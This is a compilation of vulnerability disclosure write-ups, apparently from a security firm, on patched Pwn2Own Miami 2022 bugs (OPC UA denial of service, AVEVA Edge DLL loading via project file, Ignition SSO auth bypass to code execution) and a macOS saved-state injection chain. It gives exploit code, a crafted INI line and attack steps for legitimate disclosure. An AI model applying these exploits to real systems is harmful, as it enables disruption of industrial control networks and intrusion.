*/x=xtmp;X509_free(xtmp);}OpcUa_P_ByteString_Clear(&tBuffer);OpcUa_ReturnStatusCode;OpcUa_BeginErrorHandling;OpcUa_P_ByteString_Clear(&tBuffer);OpcUa_FinishErrorHandling;}
It will check if the SHA1 hash of the certificate is is the known trusted list. If not, it will continue the while loop, by checking if the issuer (obtained using X509_STORE_CTX_get_get_issuer()) is on the trusted list instead. This will continue until the entire chain has been checked.
However, what if there is a loop in the chain? In that case the while loop will turn into an infinite loop, as there is always some certificate to check. Since the entire network handling occurs in a single thread in the demo application, this will effectively make the server unresponsive for all clients. Creating a nice and effective Denial-of-Service. A loop of length one is a self-signed certificate, which is checked for (the call to X509_STORE_CTX_get_check_issued()), but it is in fact also possible to construct a loop of certificates which is longer.
Our exploit
Our exploit is simple. First we generate two certificates A and B. Since for signing the certificate you only need the private key, we can sign certificate A with the key of B, and B with the key of A. This will create a certificate chain where both certificate have each other as issuer; and thus creating a loop.
defmake_cert(name,issuer,public_key,private_key,identifier,issuer_identifier):one_day=datetime.timedelta(1,0,0)builder=x509.CertificateBuilder()builder=builder.subject_name(x509.Name([x509.NameAttribute(NameOID.COMMON_NAME,name)]))builder=builder.issuer_name(x509.Name([x509.NameAttribute(NameOID.COMMON_NAME,issuer)]))builder=builder.not_valid_before(datetime.datetime.today()-(one_day*7))builder=builder.not_valid_after(datetime.datetime.today()+(one_day*90))builder=builder.serial_number(x509.random_serial_number())builder=builder.public_key(public_key)builder=builder.add_extension(x509.SubjectKeyIdentifier(identifier),critical=False)builder=builder.add_extension(x509.AuthorityKeyIdentifier(key_identifier=issuer_identifier,authority_cert_issuer=None,authority_cert_serial_number=None),critical=False)builder=builder.add_extension(x509.BasicConstraints(ca=True,path_length=None),critical=False)# No idea if all of these are needed, but data_encipherment is required.builder=builder.add_extension(x509.KeyUsage(digital_signature=True,content_commitment=True,key_encipherment=True,data_encipherment=True,key_agreement=True,key_cert_sign=True,crl_sign=True,encipher_only=False,decipher_only=False),critical=False)# The certificate is actually self-signed, but this doesn't matter because the signature is not checked.certificate=builder.sign(private_key=private_key,algorithm=hashes.SHA256(),backend=backend)returncertificateprivate_keyA=rsa.generate_private_key(public_exponent=65537,key_size=3072,backend=backend)public_keyA=private_keyA.public_key()private_keyB=rsa.generate_private_key(public_exponent=65537,key_size=3072,backend=backend)public_keyB=private_keyB.public_key()certA=make_cert("A","B",public_keyA,private_keyB,b"1",b"2")certB=make_cert("B","A",public_keyB,private_keyA,b"2",b"1")
By trying to authenticate at the server using this certificate and including the other as an additional certificate, we can see that eventually we reach a timeout and the server will spin at 100% CPU usage.
You can see the exploit in action in the screen recording below.
Conclusion
OPC UA is often a central component between the IT and OT network of an organisation. Being able to reliably shut it down pre-authentication is a powerful primitive to have. This vulnerability shows yet again that validating certificates is an error prone operation, that should be handled with care.
This issue was fixed in version v1.7.7-549 and was given the CVE number CVE-2022-29862. Unified-Automation now uses the certificate stack that was constructed by OpenSSL for validation.
We thank Zero Day Initiative for organizing this years edition of Pwn2Own Miami, we hope to return to a later edition!
This write-up is part 3 of a series of write-ups about the 5 vulnerabilities we demonstrated last April at Pwn2Own Miami. This is the write-up for an Arbitrary Code Execution vulnerability in AVEVA Edge (CVE-2022-28688).
AVEVA Edge can be used to design Human Machine Interfaces (HMI). It allows for the designing of GUI applications, which can be programmed using a scripting language. The screenshot below shows one of the demo projects that come with the installer:
For this category it was acceptable to achieve code execution by opening a project file within the target on the contest laptop. So we tried various things to get code execution from opening a malicious project file. The application has quite some functionalities that might be useful for achieving our goal. Users can add custom controls to a project, it has a powerful scripting language and it will connect to OPC UA servers upon starting, for example. However, most attack surface will require the user to first make one or more clicks within the application; which was not allowed for the competition.
Communication drivers
AVEVA Edge also allows users to add communication drivers to a project. For example is has drivers to allow communication with a Siemens S7 PLC over a serial interface. Drivers in this case are just DLL files that are loaded into the project.
Drivers are loaded whenever the user loads a project file in AVEVA Edge, which would mean that vulnerabilities here would be triggered without further user interaction.
AVEVA Edge projects consists of multiple files and directories, but the main project file that is also associated with the application is a INI-formatted file using the .app extension. The relevant section for communication drivers can be seen below:
[UsedDrivers]Count=1Task0=Driver ABCIP
When looking at the loading process with Procmon we see that drivers are loaded from C:\Program Files (x86)\AVEVA\AVEVA Edge 2020\Drv\:
Lets see what happens if we change the INI file to:
[UsedDrivers]Count=1Task0=Driver ..\Computest
Loading the new project shows us:
Interesting :)β¦
For those interested, the actual loading of the file happens in Bin/Studio.dll at address 0x100c16f1.
Exploitation
From here exploitation is easy, we create a malicious DLL file:
You can see the exploit in action in the screen recording below.
Thoughts
Interestingly enough all binaries, including the drivers, that come with AVEVA Edge are digitally signed. However, it appears that signatures are not checked when loading libraries.
Customers who use AVEVA Edge should update to version 2020 R2 SP1 and apply HF 2020.2.00.40, which should mitigate this issue.
We thank Zero Day Initiative for organizing this years edition of Pwn2Own Miami, we hope to return to a later edition!
This was added to the Xcode template to address a process injection vulnerability we reported!
In October 2021, Apple fixed CVE-2021-30873. This was a process injection vulnerability affecting (essentially) all macOS AppKit-based applications. We reported this vulnerability to Apple, along with methods to use this vulnerability to escape the sandbox, elevate privileges to root and bypass the filesystem restrictions of SIP. In this post, we will first describe what process injection is, then the details of this vulnerability and finally how we abused it.
This research was also published at Black Hat USA 2022 and DEF CON 30.
Process injection
Process injection is the ability for one process to execute code in a different process. In Windows, one reason this is used is to evade detection by antivirus scanners, for example by a technique known as DLL hijacking. This allows malicious code to pretend to be part of a different executable. In macOS, this technique can have significantly more impact than that due to the difference in permissions two applications can have.
In the classic Unix security model, each process runs as a specific user. Each file has an owner, group and flags that determine which users are allowed to read, write or execute that file. Two processes running as the same user have the same permissions: it is assumed there is no security boundary between them. Users are security boundaries, processes are not. If two processes are running as the same user, then one process could attach to the other as a debugger, allowing it to read or write the memory and registers of that other process. The root user is an exception, as it has access to all files and processes. Thus, root can always access all data on the computer, whether on disk or in RAM.
This was, in essence, the same security model as macOS until the introduction of SIP, also known as βrootlessβ. This name doesnβt mean that there is no root user anymore, but it is now less powerful on its own. For example, certain files can no longer be read by the root user unless the process also has specific entitlements. Entitlements are metadata that is included when generating the code signature for an executable. Checking if a process has a certain entitlement is an essential part of many security measures in macOS. The Unix ownership rules are still present, this is an additional layer of permission checks on top of them. Certain sensitive files (e.g. the Mail.app database) and features (e.g. the webcam) are no longer possible with only root privileges but require an additional entitlement. In other words, privilege escalation is not enough to fully compromise the sensitive data on a Mac.
For example, using the following command we can see the entitlements of Mail.app:
This is what grants Mail.app the permission to read the SIP protected mail database, while other malware will not be able to read it.
Aside from entitlements, there are also the permissions handled by Transparency, Consent and Control (TCC). This is the mechanism by which applications can request access to, for example, the webcam, microphone and (in recent macOS versions) also files such as those in the Documents and Download folders. This means that even applications that do not use the Mac Application sandbox might not have access to certain features or files.
Of course entitlements and TCC permissions would be useless if any process can just attach as a debugger to another process of the same user. If one application has access to the webcam, but the other doesnβt, then one process could attach as a debugger to the other process and inject some code to steal the webcam video. To fix this, the ability to debug other applications has been heavily restricted.
Changing a security model that has been used for decades to a more restrictive model is difficult, especially in something as complicated as macOS. Attaching debuggers is just one example, there are many similar techniques that could be used to inject code into a different process. Apple has squashed many of these techniques, but many other ones are likely still undiscovered.
Aside from Appleβs own code, these vulnerabilities could also occur in third-party software. Itβs quite common to find a process injection vulnerability in a specific application, which means that the permissions (TCC permissions and entitlements) of that application are up for grabs for all other processes. Getting those fixed is a difficult process, because many third-party developers are not familiar with this new security model. Reporting these vulnerabilities often requires fully explaining this new model! Especially Electron applications are infamous for being easy to inject into, as it is possible to replace their JavaScript files without invalidating the code signature.
More dangerous than a process injection vulnerability in one application is a process injection technique that affects multiple, or even all, applications. This would give access to a large number of different entitlements and TCC permissions. A generic process injection vulnerability affecting all applications is a very powerful tool, as weβll demonstrate in this post.
The saved state vulnerability
When shutting down a Mac, it will prompt you to ask if the currently open windows should be reopened the next time you log in. This is a part of functionally called βsaved stateβ or βpersistent UIβ.
When reopening the windows, it can even restore new documents that were not yet saved in some applications.
It is used in more places than just at shutdown. For example, it is also used for a feature called App Nap. When application has been inactive for a while (has not been the focused application, not playing audio, etc.), then the system can tell it to save its state and terminates the process. macOS keeps showing a static image of the applicationβs windows and in the Dock it still appears to be running, while it is not. When the user switches back to the application, it is quickly launched and resumes its state. Internally, this also uses the same saved state functionality.
When building an application using AppKit, support for saving the state is for a large part automatic. In some cases the application needs to include its own objects in the saved state to ensure the full state can be recovered, for example in a document-based application.
Each time an application loses focus, it writes to the files:
The windows.plist file contains a list of all of the applicationβs open windows. (And some other things that donβt look like windows, such as the menu bar and the Dock menu.)
For example, a windows.plist for TextEdit.app could look like this:
The data.data file contains a custom binary format. It consists of a list of records, each record contains an AES-CBC encrypted serialized object. The windows.plist file contains the key (NSDataKey) and a ID (NSWindowID) for the record from data.data it corresponds to.1
For example:
00000000 4e 53 43 52 31 30 30 30 00 00 00 01 00 00 01 b0 |NSCR1000........|
00000010 ec f2 26 b9 8b 06 c8 d0 41 5d 73 7a 0e cc 59 74 |..&.....A]sz..Yt|
00000020 89 ac 3d b3 b6 7a ab 1b bb f7 84 0c 05 57 4d 70 |..=..z.......WMp|
00000030 cb 55 7f ee 71 f8 8b bb d4 fd b0 c6 28 14 78 23 |.U..q.......(.x#|
00000040 ed 89 30 29 92 8c 80 bf 47 75 28 50 d7 1c 9a 8a |..0)....Gu(P....|
00000050 94 b4 d1 c1 5d 9e 1a e0 46 62 f5 16 76 f5 6f df |....]...Fb..v.o.|
00000060 43 a5 fa 7a dd d3 2f 25 43 04 ba e2 7c 59 f9 e8 |C..z../%C...|Y..|
00000070 a4 0e 11 5d 8e 86 16 f0 c5 1d ac fb 5c 71 fd 9d |...]........\q..|
00000080 81 90 c8 e7 2d 53 75 43 6d eb b6 aa c7 15 8b 1a |....-SuCm.......|
00000090 9c 58 8f 19 02 1a 73 99 ed 66 d1 91 8a 84 32 7f |.X....s..f....2.|
000000a0 1f 5a 1e e8 ae b3 39 a8 cf 6b 96 ef d8 7b d1 46 |.Z....9..k...{.F|
000000b0 0c e2 97 d5 db d4 9d eb d6 13 05 7d e0 4a 89 a4 |...........}.J..|
000000c0 d0 aa 40 16 81 fc b9 a5 f5 88 2b 70 cd 1a 48 94 |..@.......+p..H.|
000000d0 47 3d 4f 92 76 3a ee 34 79 05 3f 5d 68 57 7d b0 |G=O.v:.4y.?]hW}.|
000000e0 54 6f 80 4e 5b 3d 53 2a 6d 35 a3 c9 6c 96 5f a5 |To.N[=S*m5..l._.|
000000f0 06 ec 4c d3 51 b9 15 b8 29 f0 25 48 2b 6a 74 9f |..L.Q...).%H+jt.|
00000100 1a 5b 5e f1 14 db aa 8d 13 9c ef d6 f5 53 f1 49 |.[^..........S.I|
00000110 4d 78 5a 89 79 f8 bd 68 3f 51 a2 a4 04 ee d1 45 |MxZ.y..h?Q.....E|
00000120 65 ba c4 40 ad db e3 62 55 59 9a 29 46 2e 6c 07 |[email protected].)F.l.|
00000130 34 68 e9 00 89 15 37 1c ff c8 a5 d8 7c 8d b2 f0 |4h....7.....|...|
00000140 4b c3 26 f9 91 f8 c4 2d 12 4a 09 ba 26 1d 00 13 |K.&....-.J..&...|
00000150 65 ac e7 66 80 c0 e2 55 ec 9a 8e 09 cb 39 26 d4 |e..f...U.....9&.|
00000160 c8 15 94 d8 2c 8b fa 79 5f 62 18 39 f0 a5 df 0b |....,..y_b.9....|
00000170 3d a4 5c bc 30 d5 2b cc 08 88 c8 49 d6 ab c0 e1 |=.\.0.+....I....|
00000180 c1 e5 41 eb 3e 2b 17 80 c4 01 64 3d 79 be 82 aa |..A.>+....d=y...|
00000190 3d 56 8d bb e5 7a ea 89 0f 4c dc 16 03 e9 2a d8 |=V...z...L....*.|
000001a0 c5 3e 25 ed c2 4b 65 da 8a d9 0d d9 23 92 fd 06 |.>%..Ke.....#...|
[...]
Whenever an application is launched, AppKit will read these files and restore the windows of the application. This happens automatically, without the app needing to implement anything. The code for reading these files is quite careful: if the application crashed, then maybe the state is corrupted too. If the application crashes while restoring the state, then the next time the state is discarded and it does a fresh start.
The vulnerability we found is that the encrypted serialized object stored in the data.data file was not using βsecure codingβ. To explain what that means, weβll first explain serialization vulnerabilities, in particular on macOS.
Serialized objects
Many object-oriented programming languages have added support for binary serialization, which turns an object into a bytestring and back. Contrary to XML and JSON, these are custom, language specific formats. In some programming languages, serialization support for classes is automatic, in other languages classes can opt-in.
In many of those languages these features have lead to vulnerabilities. The problem in many implementations is that an object is created first, and then its type is checked. Methods may be called on these objects when creating or destroying them. By combining objects in unusual ways, it is sometimes possible to gain remote code execution when a malicious object is deserialized. It is, therefore, not a good idea to use these serialization functions for any data that might be received over the network from an untrusted party.
For Python pickle and Ruby Marshall.load remote code execution is straightforward. In Java ObjectInputStream.readObject and C#, RCE is possible if certain commonly used libraries are used. The ysoserial and ysoserial.net tools can be used to generate a payload depending on the libraries in use. In PHP, exploitability for RCE is rare.
Objective-C serialization
In Objective-C, classes can implement the NSCoding protocol to be serializable. Subclasses of NSCoder, such as NSKeyedArchiver and NSKeyedUnarchiver, can be used to serialize and deserialize these objects.
How this works in practice is as follows. A class that implements NSCoding must include a method:
-(id)initWithCoder:(NSCoder*)coder;
In this method, this object can use coder to decode its instance variables, using methods such as -decodeObjectForKey:, -decodeIntegerForKey:, -decodeDoubleForKey:, etc. When it uses -decodeObjectForKey:, the coder will recursively call -initWithCoder: on that object, eventually decoding the entire graph of objects.
Apple has also realized the risk of deserializing untrusted input, so in 10.8, the NSSecureCoding protocol was added. The documentation for this protocol states:
A protocol that enables encoding and decoding in a manner that is robust against object substitution attacks.
This means that instead of creating an object first and then checking its type, a set of allowed classes needs to be included when decoding an object.
This means that when a secure coder is created, -decodeObjectForKey: is no longer allowed, but -decodeObjectOfClass:forKey: must be used.
That makes exploitable vulnerabilities significantly harder, but it could still happen. One thing to note here is that subclasses of the specified class are allowed. If, for example, the NSObject class is specified, then all classes implementing NSCoding are still allowed. If only NSDictionary are expected and an imported framework contains a rarely used and vulnerable subclass of NSDictionary, then this could also create a vulnerability.
In all of Appleβs operating systems, these serialized objects are used all over the place, often for inter-process exchange of data. For example, NSXPCConnection heavily relies on secure serialization for implementing remote method calls. In iMessage, these serialized objects are even exchanged with other users over the network. In such cases it is very important that secure coding is always enabled.
Creating a malicious serialized object
In the data.data file for saved states, objects were stored using an NSKeyedArchiver without secure coding enabled. This means we could include objects of any class that implements the NSCoding protocol. The likely reason for this is that applications can extend the saved state with their own objects, and because the saved state functionality is older than NSSecureCoding, Apple couldnβt just upgrade this to secure coding, as this could break third-party applications.
To exploit this, we wanted a method for constructing a chain of objects that could allows us to execute arbitrary code. However, no project similar to ysoserial for Objective-C appears to exist and we could not find other examples of abusing insecure deserialization in macOS. In Remote iPhone Exploitation Part 1: Poking Memory via iMessage and CVE-2019-8641 Samuel GroΓ of Google Project Zero describes an attack against a secure coder by abusing a vulnerability in NSSharedKeyDictionary, an uncommon subclass of NSDictionary. As this vulnerability is now fixed, we couldnβt use this.
By decompiling a large number of -initWithCoder: methods in AppKit, we eventually found a combination of 2 objects that we could use to call arbitrary Objective-C methods on another deserialized object.
We start with NSRuleEditor. The -initWithCoder: method of this class creates a binding to an object from the same archive with a key path also obtained from the archive.
Bindings are a reactive programming technique in Cocoa. It makes it possible to directly bind a model to a view, without the need for the boilerplate code of a controller. Whenever a value in the model changes, or the user makes a change in the view, the changes are automatically propagated.
This binds the property binding of the receiver to the keyPath of observable. A keypath a string that can be used, for example, to access nested properties of the object. But the more common method for creating bindings is by creating them as part of a XIB file in Xcode.
For example, suppose the model is a class Person, which has a property @property (readwrite, copy) NSString *name;. Then you could bind the βvalueβ of a text field to the βnameβ keypath of a Person to create a field that shows (and can edit) the personβs name.
In the XIB editor, this would be created as follows:
The different options for what a keypath can mean are actually quite complicated. For example, when binding with a keypath of βfooβ, it would first check if one the methods getFoo, foo, isFoo and _foo exists. This would usually be used to access a property of the object, but this is not required. When a binding is created, the method will be called immediately when creating the binding, to provide an initial value. It does not matter if that method actually returns void. This means that by creating a binding during deserialization, we can use this to call zero-argument methods on other deserialized objects!
In this case we use it to call -draw on the next object.
The next object we use is an NSCustomImageRep object. This obtains a selector (a method name) as a string and an object from the archive. When the -draw method is called, it invokes the method from the selector on the object. It passes itself as the first argument:
By deserializing these two classes we can now call zero-argument methods and multiple argument methods, although the first argument will be an NSCustomImageRep object and the remaining arguments will be whatever happens to still be in those registers. Nevertheless, is a very powerful primitive. Weβll cover the rest of the chain we used in a future blog post.
Exploitation
Sandbox escape
First of all, we escaped the Mac Application sandbox with this vulnerability. To explain that, some more background on the saved state is necessary.
In a sandboxed application, many files that would be stored in ~/Library are stored in a separate container instead. So instead of saving its state in:
Apparently, when the system is shut down while an application is still running (when the prompt is shown asking the user whether to reopen the windows the next time), the first location is symlinked to the second one by talagent. We are unsure of why, it might have something to do with upgrading an application to a new version which is sandboxed.
Secondly, most applications do not have access to all files. Sandboxed applications are very restricted of course, but with the addition of TCC even accessing the Downloads, Documents, etc. folders require user approval. If the application would open an open or save panel, it would be quite inconvenient if the user could only see the files that that application has access to. To solve this, a different process is launched when opening such a panel: com.apple.appkit.xpc.openAndSavePanelService. Even though the window itself is part of the application, its contents are drawn by openAndSavePanelService. This is an XPC service which has full access to all files. When the user selects a file in the panel, the application gains temporary access to that file. This way, users can still browse their entire disk even in applications that do not have permission to list those files.
As it is an XPC service with service type Application, it is launched separately for each app.
What we noticed is that this XPC Service reads its saved state, but using the bundle ID of the app that launched it! As this panel might be part of the saved state of multiple applications, it does make some sense that it would need to separate its state per application.
As it turns out, it reads its saved state from the location outside of the container, but with the applicationβs bundle ID:
But as we mentioned if the app was ever open when the user shut down their computer, then this will be a symlink to the container path.
Thus, we can escape the sandbox in the following way:
Wait for the user to shut down while the app is open, if the symlink does not yet exist.
Write malicious data.data and windows.plist files inside the appβs own container.
Open an NSOpenPanel or NSSavePanel.
The com.apple.appkit.xpc.openAndSavePanelService process will now deserialize the malicious object, giving us code execution in a non-sandboxed process.
This was fixed earlier than the other issues, as CVE-2021-30659 in macOS 11.3. Apple addressed this by no longer loading the state from the same location in com.apple.appkit.xpc.openAndSavePanelService.
Privilege escalation
By injecting our code into an application with a specific entitlement, we can elevate our privileges to root. For this, we could apply the technique explained by A2nkF in Unauthd - Logic bugs FTW.
Some applications have an entitlement of com.apple.private.AuthorizationServices containing the value system.install.apple-software. This means that this application is allowed to install packages that have a signature generated by Apple without authorization from the user. For example, βInstall Command Line Developer Tools.appβ and βBootcamp Assistant.appβ have this entitlement. A2nkF also found a package signed by Apple that contains a vulnerability: macOSPublicBetaAccessUtility.pkg. When this package is installed to a specific disk, it will run (as root) a post-install script from that disk. The script assumes it is being installed to a disk containing macOS, but this is not checked. Therefore, by creating a malicious script at the same location it is possible to execute code as root by installing this package.
The exploitation steps are as follows:
Create a RAM disk and copy a malicious script to the path that will be executed by macOSPublicBetaAccessUtility.pkg.
Inject our code into an application with the com.apple.private.AuthorizationServices entitlement containing system.install.apple-software by creating the windows.plist and data.data files for that application and then launching it.
Use the injected code to install the macOSPublicBetaAccessUtility.pkg package to the RAM disk.
Wait for the post-install script to run.
In the writeup from A2nkF, the post-install script ran without the filesystem restrictions of SIP. It inherited this from the installation process, which needs it as package installation might need to write to SIP protected locations. This was fixed by Apple: post- and pre-install scripts are no longer SIP exempt. The package and its privilege escalation can still be used, however, as Apple still uses the same vulnerable installer package.
SIP filesystem bypass
Now that we have escaped the sandbox and elevated our privileges to root, we did want to bypass SIP as well. To do this, we looked around at all available applications to find one with a suitable entitlement. Eventually, we found something on the macOS Big Sur Beta installation disk image: βmacOS Update Assistant.appβ has the com.apple.rootless.install.heritable entitlement. This means that this process can write to all SIP protected locations (and it is heritable, which is convenient because we can just spawn a shell). Although it is supposed to be used only during the beta installation, we can just copy it to a normal macOS environment and run it there.
The exploitation for this is quite simple:
Create malicious windows.plist and data.data files for βmacOS Update Assistant.appβ.
Launch βmacOS Update Assistant.appβ.
When exempt from SIPβs filesystem restrictions, we can read all files from protected locations, such as the userβs Mail.app mailbox. We can also modify the TCC database, which means we can grant ourselves permission to access the webcam, microphone, etc. We could also persist our malware on locations which are protected by SIP, making it very difficult to remove by anyone other than Apple. Finally, we can change the database of approved kernel extensions. This means that we could load a new kernel extension silently, without user approval. When combined with a vulnerable kernel extension (or a codesigning certificate that allows signing kernel extensions), we would have been able to gain kernel code execution, which would allow disabling all other restrictions too.
Demo
We recorded the following video to demonstrate the different steps. It first shows that the application βSandboxβ is sandboxed, then it escapes its sandbox and launches βPrivescβ. This elevates privileges to root and launches βSIP Bypassβ. Finally, this opens a reverse shell that is exempt from SIPβs filesystem restrictions, which is demonstrated by writing a file in /var/db/SystemPolicyConfiguration (the location where the database of approved kernel modules is stored):
The fix
Apple first fixed the sandbox escape in 11.3, by no longer reading the saved state of the application in com.apple.appkit.xpc.openAndSavePanelService (CVE-2021-30659).
Fixing the rest of the vulnerability was more complicated. Third-party applications may store their own objects in the saved state and these objects might not support secure coding. This brings us back to the method from the introduction: -applicationSupportsSecureRestorableState:. Applications can now opt-in to requiring secure coding for their saved state by returning TRUE from this method. Unless an app opts in, it will keep allowing non-secure coding, which means process injection might remain possible.
This does highlight one issue with the current design of these security measures: downgrade attacks. The code signature (and therefore entitlements) of an application will remain valid for a long time, and the TCC permissions of an application will still work if the application is downgraded. A non-sandboxed application could just silently download an older, vulnerable version of an application and exploit that. For the SIP bypass this would not work, as βmacOS Update Assistant.appβ does not run on macOS Monterey because certain private frameworks no longer contain the necessary symbols. But that is a coincidental fix, in many other cases older applications may still run fine. This vulnerability will therefore be present for as long as there is backwards compatibility with older macOS applications!
Nevertheless, if you write an Objective-C application, please make sure you add -applicationSupportsSecureRestorableState: to return TRUE and to adapt secure coding for all classes used for your saved states!
Conclusion
In the current security architecture of macOS, process injection is a powerful technique. A generic process injection vulnerability can be used to escape the sandbox, elevate privileges to root and to bypass SIPβs filesystem restrictions. We have demonstrated how we used the use of insecure deserialization in the loading of an applicationβs saved state to inject into any Cocoa process. This was addressed by Apple as CVE-2021-30873.
This write-up is part 2 of a series of write-ups about the 5 vulnerabilities we demonstrated last April at Pwn2Own Miami. This is the write-up for a Remote Code Execution vulnerability in Inductive Automation Ignition, by using an authentication bypass (CVE-2022-35871).
Conformed! @daankeuper and @xnyhps from Computest Sector 7 (@sector7_nl) used a missing authentication for critical function vuln to execute code on Inductive Automation Ignition . They win $20,000 and 20 Master of Pwn points. #Pwn2Own#P2O
The cause of this vulnerability was a weak authentication implementation when using Active Directory single sign-on. We combined this with intended(?) functionality that allowed us to execute Python code on the server (as SYSTEM).
Background
Inductive Automation Ignition is an application that was part of in the βControl Serverβ category. Control servers are used to supervise and communicate with lower-level devices, such as PLCs. This makes them a critical element in any ICS network.
Ignition is organized in different projects, which are managed using a web interface. Each project needs a user source which determines the authentication and authorization for that project. Authentication can be internal, using a database, or based on Active Directory (which has some sub-options that determine how authorization is handled). The projects can then be used from Ignition Perspective, a desktop application which communicates with the Ignition server through the gateway API.
When one of the AD based user sources is configured, it offers an option named βSSO Enabledβ.
To configure an AD based user source, the server needs to be configured with an AD account, the IP address of a domain controller and the Active Directory domain name. The AD account is used to set up an LDAP connection to the AD server for the application itself.
Vulnerability
Auth bypass
While, looking at the decompiled Java code (Ignition/lib/core/gateway/gateway-api-8.1.16.jar) for how the SSO authentication is handled in the gateway API, we noticed that the function implementing SSO is a lot simpler than we expected.
protectedAuthenticatedUserauthenticateAdSso(AuthChallengechallenge)throwsException{StringssoUname=(String)challenge.get(User.Username);StringssoDomain=(String)challenge.get(ADSSOAuthChallenge.ADDomain);if(StringUtils.isBlank(ssoUname)){this.log.debug("SSO username is blank.");returnnull;}if(StringUtils.isBlank(ssoDomain)){this.log.debugf("SSO domain is blank for user '%s'",newObject[]{ssoUname});returnnull;}if(ssoDomain.equalsIgnoreCase(this.domain)){UserexistingUser=this.userSource.findSSOUser(ssoUname);if(existingUser!=null)return(AuthenticatedUser)newBasicAuthenticatedUser(existingUser,newDate());this.log.debug(String.format("Existing user was not found for username '%s'",newObject[]{ssoUname}));}else{this.log.debug(String.format("SSO domains did not match! Compared '%s' and '%s'",newObject[]{this.domain,ssoDomain}));}returnnull;}
This function receives an AuthChallenge object (essentially a JSON dictionary). It checks that it contains a key for the username and a key for the SSO domain. Then it compares the value for the SSO domain to the configured Active Directory domain name. If it matches, it looks up the username using LDAP and, if found, returns it as an AuthenticatedUser object.
Thereβs no check here for a password, token, signature, or anything like that. The only data that needs to be submitted to the server is the username and the Active Directory domain name. In other words, the vulnerability here is that there is no SSO implementation at all! Itβs not even clear to us what type of SSO was intended to be used here, probably Kerberos?
RCE
To go from an authenticated user to code execution, we used what we assume is intended functionality that allows us to evaluate Python on the server. There is a ScriptInvoke gateway API endpoint with an execute function. Authenticated users can submit Python code to this endpoint, which is executed on the server with the same privileges as the server (on Windows, this is SYSTEM). Ignition Designer offers the ability to execute scripts on the server in response to specific events or regular intervals. This does not appear to require any special role or permissions, so this design looks risky to us, but it does seem to function as designed.
Exploit
To exploit the auth bypass, the server needs to be configured using AD authentication with SSO enabled. To perform the attack, we need the following information:
The name of a project using this authentication method.
The name of an existing AD user.
The name of the AD domain.
It turns out that the first two were easy to do. There is an unauthenticated API endpoint on the admin interface returning the list of all projects:
http://<server IP>/data/perspective/projects
For the username, this simply had to be any existing AD user, regardless of permissions in AD or Ignition. So, we could just use βAdministratorβ, as that user will always exist in AD.
This only leaves the AD domain name, which we didnβt find a way to obtain automatically from Ignition. In practice, that value should be easy to obtain when attacking a company, especially if the attacker is already on the companyβs internal network. In most cases this would just be the companyβs primary domain name, or the value might leak in email headers, file metadata, etc.
Finally, we used a reverse shell implemented in Python to setup a connection back to our attacker machine.
Impact
Exploiting these vulnerabilities would grant us code execution on the machine hosting Ignition. This means that we could immediately manipulate or disrupt any process handled by or via this server. For example, we might be able to take over the communication with PLCs. In addition, the SYSTEM privileges would make it a fantastic starting point for further attacks other parts of the ICS or IT network.
In most cases, the Ignition server will not be exposed publicly to the internet, but only available on the internal ICS network. Therefore, this vulnerability would need to be combined with different vulnerabilities or attacks that grant us access to that network.
The fix
This vulnerability was addressed by Inductive Automation in versions 8.1.17 and 7.9.20 and assigned CVE-2022-35871. AD User Sources now disable the βSSO Enabledβ setting automatically, unless a specific flag is set on the server (-Dignition.enableInsecureAdSso=true). In other words, Inductive Automation has chosen to deprecate this feature and documented that it is dangerous to use. This may seem like a disappointing fix, but implementing a secure SSO protocol would likely have taken a lot more time. This way the vulnerability can be avoided and, if desired, Inductive Automation could implement a secure SSO protocol without time pressure.
Thoughts
When implementing security critical features (such as authentication), it is important to make a good design first. When authentication is combined with single sign-on and native applications this is even more important, as it can become very complex. With such a design, it becomes possible to catch mistakes before the features are implemented and to test each part separately.
While we of course donβt know how this feature was built, we suspect no such design was created. Having a cryptographic protocol like Kerberos completely missing from the implementation should be quite obvious if the feature had been fully designed first.
Features allowing users to execute their own code on a server can be required in certain use-cases. However, the fact that this was available for a user who did not have any permissions or roles explicitly assigned to them is worrisome. This means that any authentication bypass immediately becomes an RCE vulnerability.
Conclusion
Weβve demonstrated a remote code execution vulnerability against Inductive Automation Ignition. We found that authentication can be bypassed on a server with AD single sign-on enabled. The (cryptographic) protocol for handling single sign-on appears to not be implemented at all.
After bypassing the authentication, we used functionality of the server to execute arbitrary Python code with SYSTEM privileges to set up a reverse shell.
Big shout-out to Inductive Automation on handling this years edition of Pwn2Own! They published all details of all findings on their website, including a extensive write-up of their thoughts and fixes. Well done!
We thank Zero Day Initiative for organizing this years edition of Pwn2Own Miami, we hope to return to a later edition!
This write-up is part 1 of a series of write-ups about the 5 vulnerabilities we demonstrated last April at Pwn2Own Miami. This is the write-up for the Trusted Application Check Bypass in the OPC Foundationβs OPC UA .NET Standard (CVE-2022-29865).
OPC UA is a communication protocol used in the ICS world. It is an open standard developed by the OPC Foundation. Because it is implemented by many vendors, it is often the preferred protocol for setting up communication between systems from different vendors in an ICS network.
The security for OPC UA connections can be configured in three different ways: without any security, only signing and signing and encryption. In the latter two cases, both endpoints authenticate to each other using X.509 certificates. While these are the same type of certificates as used in TLS, the encryption protocol itself is custom and not based on TLS.
At Pwn2Own Miami 2022, four OPC UA servers were in scope, with three different βpayloadβ options:
Denial-of-Service. Availability is everything in an ICS network, so being able to crash an OPC UA server can have significant impact.
Remote code execution. Being able to take over the server.
Bypass Trusted Application Check. Setting up a trusted connection to a server without having a valid certificate.
Of course, with a pre-authentication RCE it would be possible to modify the configuration of the server to change the security level and bypass the trusted application check that way, but this was not allowed.
OPC UA .NET Standard
We looked at potential trusted certificate bypasses in all four servers in scope, we only found one in the server OPC UA .NET Standard. This server is used as a reference implementation for OPC UA in C# and is open source, meaning that this bypass could affect many ICS products that incorporate it as a library.
The core of the issue is in the function InternalValidate in CertificateValidator.cs. The logic for verifying a certificate here is quite complicated, which likely contributed to a bug like this to be missed.
What we heard from the OPC Foundation is that the reason this check is so complicated is that they do not want to use the built-in certificate store of Windows. Instead, the certificates of the application can be managed by placing the certificate files in a specific directory on the server. The OPC UA specification has such a high level of detail that it even suggests how to store those certificates.
The core issue here is that two different certificate chains are built without verifying that they are equal. By crafting a chain in a very specific way, it is possible to make the server accept it, even though it is not signed by a trusted root.
